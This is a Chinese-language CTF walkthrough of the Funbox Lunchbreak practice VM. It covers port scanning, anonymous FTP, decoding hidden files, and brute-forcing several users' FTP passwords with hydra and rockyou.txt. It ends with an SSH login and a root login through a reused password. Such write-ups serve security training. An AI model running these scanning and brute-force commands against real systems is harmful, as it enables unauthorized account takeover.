ftp爆破funboxlunchbreaker_tpaer的博客-爱代码爱编程
FunboxLunchbreaker
一次简单的爆破通关
信息收集
扫描靶机ip 192.168.3.134
arp-scan -l
扫描开放端口,扫描出21/22/80端口
nmap -sV -A -p- 192.168.3.134
21端口开启了ftp,并可以匿名登录,尝试ftp登录下载文件
ftp 192.168.3.134
anonymous
共有3个文件
下载下来
get .s3cr3t
get supers3cr3t
get wordpress (下载失败)
查看下载好的两个文件
分别解码(没有有用的信息)
base64解码:
If the radiance of a thousand suns / were to burst at once into the sky / that would be like / the splendor of the Mighty One and I am become Death, the shatterer of worlds
BrainFuck解码:
Look deep into nature and then you will understand everything better."
接下来对80端口进行探测
访问页面,是一张图片
页面源代码
<img src="image.jpg"> <! webdesign by j.miller [jane@funbox8.ctf] >
对目录进行扫描,扫描出robots.txt
python dirsearch.py -u http://192.168.3.134/
what you see what you get 所见即所得(意思是不用扫描了)
那就只有爆破了
ftp爆破
之前在页面源代码中发现了一段注释
<! webdesign by j.miller [jane@funbox8.ctf] >
jane应该就是用户名,爆破他的账号
hydra 192.168.3.134 ftp -l jane -P rockyou.txt -vV
得到密码password
登录jane账号,发现keys.txt下载下来
再去家目录看看其他用户里面有什么
其他用户目录进不去继续爆破
将这几个用户的名字写成一本字典user.txt
hydra 192.168.3.134 ftp -L user.txt -P /usr/share/wfuzz/wordlist/rockyou.txt -vV
先跑出了jim的账号,登录jim后台继续跑着
在jim目录下没发现有用的信息
由于john迟迟没跑下来,先爆破下jules直接最大线程跑
hydra 192.168.3.134 ftp -l jules -P rockyou.txt -t64 -vV
登录jules,发现了几个密码本
到现在john还没跑下来,用得到的密码本爆破
hydra 192.168.3.134 ftp -l john -P .good-passwd -vV
.good-passwd没跑下来,最后用.bad-passwds跑下来了
hydra 192.168.3.134 ftp -l john -P .bad-passwds -vV
那边的爆破可以停了
直接ssh登录john
ssh john@192.168.3.134
说root的密码和john一样
直接切换用户root
su root